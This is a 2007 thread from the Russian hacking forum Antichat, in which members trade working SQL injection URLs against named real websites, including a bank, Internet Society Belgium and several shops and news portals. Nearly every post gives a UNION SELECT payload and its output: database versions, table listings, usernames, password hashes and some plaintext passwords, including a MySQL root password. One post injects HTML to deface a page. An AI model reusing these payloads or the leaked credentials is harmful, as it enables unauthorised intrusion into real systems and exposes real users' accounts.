Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
23.10.2007, 01:38
|
|
Познающий
Регистрация: 04.10.2007
Сообщений: 32
Провел на форуме:
188171
Репутация:
88
|
|
Код:
http://www.llatalent.com/current/index.php?current_id=999999+union+select+1,2,concat(version(),0x2F%20,database(),0x2F,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
4.0.27-standard/admin_llatalent_com/dbm.llatalent.com@web175.megawebservers.com
Последний раз редактировалось -MoLoToK-; 23.10.2007 в 01:40..
|
|
|
23.10.2007, 13:41
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Промторгбанк
http://www.ptbank.ru/doc.php?id=-2+union+select+1,2,user,password,4,6,7,8+from+mysq l.user+limit+0,1/*
Version: 4.0.24-log
User: wechsel@localhost
Username (mysql): root
Password (mysql): 5be593ab2a724d73: q1w2e3r4
|
|
|
|
23.10.2007, 13:58
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
Internet Society Belgium
Код:
http://www.isoc.be/news.php?ID=-1+union+select+concat(version(),0x3a,database(),0x3a,user())/*
5.0.32-Debian_7etch1:isocbe:isoceccorg@localhost
171 таблица:
Код:
http://www.isoc.be/news.php?ID=-1+union+select+table_name+from+information_schema.tables+limit+171,1/*
Есть несколько интересных таблиц (cms_users, phpbb_users, tbllogins, tblusers, isoc_users, phpbb_nonsenseusers),
но смог подобрать только одно поле username из таблицы tblusers.
|
|
|
|
23.10.2007, 14:45
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
kubmarket.ru
http://www.kubmarket.ru/news/view/?id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4,5,6,7/*
4.1.22/wwwkubmarketru/kubmarke@localhost
http://www.kubmarket.ru/news/view/?id=-1+union+select+1,2,concat(userlogin,0x2F,userpassw ord,0x2F,useremail),4,5,6,7+from+users+limit+0,1/*
логин/пароль/мейл не хеш.
|
|
|
|
23.10.2007, 15:26
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
2 fRg
http://www.isoc.be/news.php?ID=-1+union+select+column_name+from+information_schema .columns%20where%20table_name=CHAR(116,98,108,117, 115,101,114,115)%20limit%202,1/*
Не нужно ничего "подбирать" это пятая версия мускула, значит можно все увидеть 
При этом запросе мы видим что есть поле Paswoord (именно так 2 буквы "о").
Аналогично смотрим другие таблицы и столбики в них. |
|
|
|
23.10.2007, 18:48
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
sexarea.ru
http://www.sexarea.ru/news/detail.php?news=-1+union+select+1,concat(version(),0x2F,database(), 0x2F,user()),3/*
5.1.20-beta/sexarea_usexar11/sexarea_usexar11@localhost
http://www.sexarea.ru/news/detail.php?news=-1+union+select+1,concat(username,0x2F,user_passwor d,0x2F,user_icq),3+from+zf_users/*
логин/хеш/уин
|
|
|
|
23.10.2007, 20:21
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Сообщение от v1ru$
Код:
http://www.av d.org.ua/viewdetails.php?id=-2019+UNION+SELECT+1,2,3,4,conc at(user(),0x3a,database(),0x3a,version()),6,7,8,9,10,11,12,13,14,15/*
Есть таблица user и поле username Вот это совпало =) минуту назад хекал этоже
Код:
http://studyport.info/viewdetails.php?id=-1+union+select+1,concat(username,0x3a,passwd,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15+from+user+limit+101,1/*
подобрал методом тыка 
|
|
|
|
23.10.2007, 20:35
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
Код:
http://www.livemusicdirect.co.uk/bands.php?band_id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(user_id,0x3a,username,0x3a,password)+from+user_ login+limit+684,1/*&start=0
код:
http://www.livemusicdirect.co.uk/bands.php?band_id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at_ws(0x3a,user_id,status_id,surname,forename,tel, mobile,email,userType,pass)+from+user+limit+700,1/*&start=0
|
|
|
|
23.10.2007, 21:51
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
rossoshweb.ru
http://www.rossoshweb.ru/modules/news/news.php?id_news=-1+union+select+1,concat(version(),0x2F,database(), 0x2F,user()),3,4,5,6,7,8,9,10/*
5.0.45-log/u66116_2/u66116@10.10.223.237
http://www.rossoshweb.ru/modules/news/news.php?id_news=-1+union+select+1,concat(username,0x2F,user_passwor d),3,4,5,6,7,8,9,10+from+u66116.as_users+limit+1,1/*
логин/хеш в <title>
admin/21232f297a57a5a743894a0e4a801fc3
--------------------------------------------------------------------
http://www.chelnews.ru/auto/?newsid=-1+union+select+concat(version(),0x2F,database(),0x 2F,user())/*
4.0.27-standard-log/chelnews_main/chelnews_admin@localhost
|
|
|
|
23.10.2007, 21:55
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
site: http://www.savage.ua/
site: http://www.savage.ru/
Код:
http://savage.ua/news.php?target=news&id=994'+unIon+SeleCt+1,concat(table_schema,'.',table_name),3,4+from+information_schema.tables+limit+17,1/*
savageua.buy
savageua.news
savageua.tech
Код:
http://savage.ua/news.php?target=news&id=994'+unIon+SeleCt+1,column_name,3,4+from+information_schema.columns+where+table_name='buy'+limit+8,1/*
лёгкий прикол
Код:
http://savage.ua/news.php?target=news&id=994'+unIon+SeleCt+null,CONVERT(0x3c666f6e7420636f6c6f723d677265656e3e3c68313ed0a2d0b5d0bbd0bed0b3d180d0b5d0b9d0bad0b020416e7469636861743c2f68313e%20USING%20utf8),0x3c623e506f7765722062793c2f623e3c2f666f6e743e3c696d67207372633d687474703a2f2f666f72756d2e616e7469636861742e72752f616e7469636861742f7069632f7261632e6769663e,null/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
